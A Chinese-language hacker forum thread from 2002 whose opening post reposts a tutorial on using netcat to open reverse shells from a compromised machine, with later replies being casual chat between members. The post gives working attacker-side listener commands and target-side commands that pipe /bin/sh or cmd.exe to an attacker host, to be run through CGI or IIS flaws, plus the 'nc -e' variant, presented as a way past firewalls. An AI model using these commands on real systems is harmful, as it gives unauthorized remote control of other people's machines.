>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  [转帖]如何用nc建立反向通道
发表文章 发表涂鸦
  回复数:5  点击数:254 将此页发给您的朋友        
作者 主题: [转帖]如何用nc建立反向通道 回复 | 收藏 | 打印 | 篇末
totaly帅哥哦
级别:老 站 友
威望:0
经验:0
货币:296
体力:12.7
来源:中原
总发帖数:313
注册日期:2002-01-29
查看 邮件 主页 QQ 消息 引用 复制 下载 


如何用nc建立反向通道
( 2002/01/22)



在Hacking Exposed上讲了两个办法。经过试验是可行的。


方法一:

使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接,通常防火墙不会阻挡。

攻击者机器:开两个窗口(or 两个终端)机器类型不限

nc -l -n -v -p 80 (该窗口用来输入命令)

nc -l -n -v -p 25 (该窗口用来得到输出)

目标机器:

通过cgi的毛病或者IIS的毛病来运行该指令

nc 攻击者机器 80 | /bin/sh | nc 攻击者机器 25

nc 攻击者机器 80 | c:\winnt\system32\cmd.exe | nc 攻击者机器 25 (对于windows NT作为目标的情况)

这个时候从nc监听80的那个窗口输入命令,就可以从监听25那个窗口看到结果了。

没解决的问题:

Hacking Exposed上说是完全可以用telnet来运行的。也就是上面在目标机器执行的nc都是可以用telnet来取代,它是假设目标机器没有nc这个工具的。实际上我研究不出来。不灵,只能连接一下,马上就断了。


方法二:

目标机器有nc的情况,不过这个nc要有-e参数。windows下的nc.exe默认就是有-e参数。而UNIX下的默认是没有的。具体原因是要在netcat.c里打开一个已经#define GAPING_SECURITY_HOLE选项。不过什么原因我不懂,就直接把sinbad改好的netcat.c发过来好了。

攻击者机器:

nc -l -n -v -p 80

目标机器:

nc -e /bin/sh 攻击者机器 80 (这个时候该窗口将得到交互式的SHELL)

nc -e c:\winnt\system32\cmd.exe 攻击者机器 80


ok了

----------------------------------------------------------
我的主业和我的副业---我的奋斗
编辑 删除 发表时间发表于 2002-04-13.19:36:53  MSIE 5.01 Windows 2000IP: 已记录
d0nNy帅哥哦
级别:老 站 友
威望:0
经验:0
货币:19
体力:0.8
来源:好像是三番市
总发帖数:381
注册日期:2002-04-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

^_^.
----------------------------------------------------------
┏━━━━━━━━━━━━━━━━━━━━┓
┃姓名:d0nNy ┌───┐┃
┃出 生 地:香港│ 照 │┃
┃持牌类型:灌水执照││┃
┃注:1.持此照可在任何地区灌水。│ 片 │┃
┃2.此执照仅限本人使用不得转让。└───┘┃
┗━━━━━━━━━━━━━━━━━━━━┛
编辑 删除 发表时间发表于 2002-04-13.19:39:11  MSIE 6.0 Windows 2000IP: 已记录
totaly帅哥哦
级别:老 站 友
威望:0
经验:0
货币:296
体力:12.7
来源:中原
总发帖数:313
注册日期:2002-01-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

楼上的你好,好久不见了,前一段上哪儿闭关了?
----------------------------------------------------------
我的主业和我的副业---我的奋斗
编辑 删除 发表时间发表于 2002-04-13.19:44:22  MSIE 5.01 Windows 2000IP: 已记录
d0nNy帅哥哦
级别:老 站 友
威望:0
经验:0
货币:19
体力:0.8
来源:好像是三番市
总发帖数:381
注册日期:2002-04-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

干了一段时间的人事管理工作,累的不行,辞了干老本行了撒。啊嘎嘎
----------------------------------------------------------
┏━━━━━━━━━━━━━━━━━━━━┓
┃姓名:d0nNy ┌───┐┃
┃出 生 地:香港│ 照 │┃
┃持牌类型:灌水执照││┃
┃注:1.持此照可在任何地区灌水。│ 片 │┃
┃2.此执照仅限本人使用不得转让。└───┘┃
┗━━━━━━━━━━━━━━━━━━━━┛
编辑 删除 发表时间发表于 2002-04-13.19:47:15  MSIE 6.0 Windows 2000IP: 已记录
totaly帅哥哦
级别:老 站 友
威望:0
经验:0
货币:296
体力:12.7
来源:中原
总发帖数:313
注册日期:2002-01-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

有一篇文章,不记得是你还是沙子写的,关于提升权限的问题,
当时我还打印了出来,很受益!
不管是谁,ths!
----------------------------------------------------------
我的主业和我的副业---我的奋斗
编辑 删除 发表时间发表于 2002-04-13.19:52:48  MSIE 5.01 Windows 2000IP: 已记录
d0nNy帅哥哦
级别:老 站 友
威望:0
经验:0
货币:19
体力:0.8
来源:好像是三番市
总发帖数:381
注册日期:2002-04-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

呵呵,不用的,我从别人的文章里面也收益非浅。啊嘎嘎
----------------------------------------------------------
┏━━━━━━━━━━━━━━━━━━━━┓
┃姓名:d0nNy ┌───┐┃
┃出 生 地:香港│ 照 │┃
┃持牌类型:灌水执照││┃
┃注:1.持此照可在任何地区灌水。│ 片 │┃
┃2.此执照仅限本人使用不得转让。└───┘┃
┗━━━━━━━━━━━━━━━━━━━━┛
编辑 删除 发表时间发表于 2002-04-13.20:00:35  MSIE 6.0 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题